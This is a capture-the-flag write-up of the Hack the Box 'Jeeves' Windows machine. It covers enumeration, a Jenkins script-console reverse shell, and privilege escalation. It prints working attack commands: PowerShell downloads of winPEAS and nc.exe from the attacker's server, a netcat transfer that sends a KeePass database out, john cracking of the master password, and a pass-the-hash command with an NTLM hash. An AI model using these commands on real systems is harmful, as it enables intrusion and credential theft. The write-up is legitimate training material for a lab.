Hack the Box Jeeves
This was a fantastic Windows machine that involved deeper enumeration to identify a service running on a non standard port of 50000. With an unauthenticated connection we execute code from the provided console to obtain a foot hold as user. Running winpeas shows there is a keepass database and the privillege exploit checker shows a juicy potatoe exploit.
Web app code execution
KeePass database cracking
WIndows Data Exfiltration - (Sender) nc -nv 10.10.14.102 6363 < CEH.kdbx - (Listener) nc -nlvp 6363 > CEH,kdbx
Linux ---> Windows File Transfer - powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/winPEAS.exe, 'winPeas.exe') - With a linux http.server
Pass the hash - sudo pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.129.1.109 cmd.exe
Alternative data stream
Simple http server
As always we start off with a basic nmap scan followed by a version enumeration and the use of the nmap basic scanning scripts. These are denoted by;
-sC - default scripts
-sV - default versions
└─$ nmap 10.129.1.109 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 17:07 EDT Nmap scan report for 10.129.1.109 Host is up (0.16s latency). Not shown: 996 filtered ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 445/tcp open microsoft-ds 50000/tcp open ibm-db2
└─$ nmap -sC -sV 10.129.1.109 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 17:07 EDT Nmap scan report for 10.129.1.109 Host is up (0.16s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Ask Jeeves 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 50000/tcp open http Jetty 9.4.z-SNAPSHOT |_http-server-header: Jetty(9.4.z-SNAPSHOT) |_http-title: Error 404 Not Found Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Port 80 - HTTP webserver
Port 135 - RPC Client
Port 445 - File share
Port 5000 - Jetty 9.4.1-SNAPSHOPT
Enumeration Port 80
Port 80 is running on Microsoft IIS httpd 10 which is very new and we are unlikely to find public CVE's. Further more the website provides constant errors and has no real content.
Enumeration Port 135
Using impackets rpddump.py I scrapped the service for information and found nothing particularly useful.
Enumeration Port 445
SmbClient connections required authentication
smbmap -H also required authentication
Enumeration Port 5000
Port 5000 is looking like the most likely attack vector.
The default website provides an error and has no default directory I think, so the next step in the processes is to check for hidden directories with dirbuster.
We see that /askjeeves/ is eventually found.
This landing page puts us in an authenticated session right off the bat and totally opens the door for exploitation. I know from experience that apps like Jenkins and code automation servers that are found on Hack the box and the OSCP PWK labs, can often be exploited by executing code on the platform with the native script builder or console and authenticated access.
After poking around it was suggested that this app is using the groovy language. So my next focus is "Groovy reverse shells". This turns up an immediate result on github.
This part is simple enough, we copy&paste the code into the script console, entering our specific network information.
Our listener gets the catch upon running the "Build executor" in the Jenkins application. This provides us with user level privilege and we capture our first flag.
The first place to always start with privilege escalation is by uploading winpeas, a windows enumeration script that is focused on finding privileges escalation opportunities.
This is done by spinning up a python3 http server.
We can download the file onto windows with the following command run on the target windows machine.
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/winPEAS.exe, 'winPeas.exe')
Referenced from here
Running winpeas provides something obvious right at the end of the results screen as it relates to keepass a common password manager.
Some simple research on KeePass database vulnerabilities yields almost immediate results.
Acquiring keepass.kdbx file
From here we browse to the suggested keepass location of C:\users\kohsuke\documents\CEH.kdbx.
The next step is to exfiltrate this information onto my local machine. After an initial search for binaries on windows that would help with this, I decided to upload nc.exe. I used this link here to reference the file transfer commands with nc.exe.
The command to download nc.exe from the windows machine, served up with a python3 http.server.
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/nc.exe, 'nc.exe')
Netcat commands to upload the CEH.kdbx to a target listening server.
Netcat command to receive the upload.
Crack the database
Using this blog I found online here, https://tzusec.com/cracking-keepass-database/ we can work towards opening this file and pivoting to root.
Extract the hash
Firstly we can actually extract the hash of the master password using the john library, in particular the keepass module.
└─$ keepass2john CEH.kdbx CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
└─$ keepass2john CEH.kdbx > hash.txt
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (KeePass [SHA256 AES 32/64]) Cost 1 (iteration count) is 6000 for all loaded hashes Cost 2 (version) is 2 for all loaded hashes Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status moonshine1 (CEH) 1g 0:00:00:23 DONE (2021-07-25 21:52) 0.04180g/s 2298p/s 2298c/s 2298C/s mwuah..moonshine1 Use the "--show" option to display all of the cracked passwords reliably Session completed
Open the cracked DB
From here I installed keepass2 on my kali linux machine.
I tried all the passwords and stuffed them anywhere everywhere I could. But at the end of the day, the "Backup stuff" password was a possible hash with no user name. So I proceeded to attempted to pass the hash, initially with impacket however this was constantly erroring out, so I learned about a new tool "pth-winexe". This was successful with the "administrator" username appended to the hash and separated with a : OR % character. From here we captured the root flag.
sudo pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.129.1.109 cmd.exe
Wait a sec! That is not root!
The old "alternate data stream trick". I learned about a variation of this back in highschool.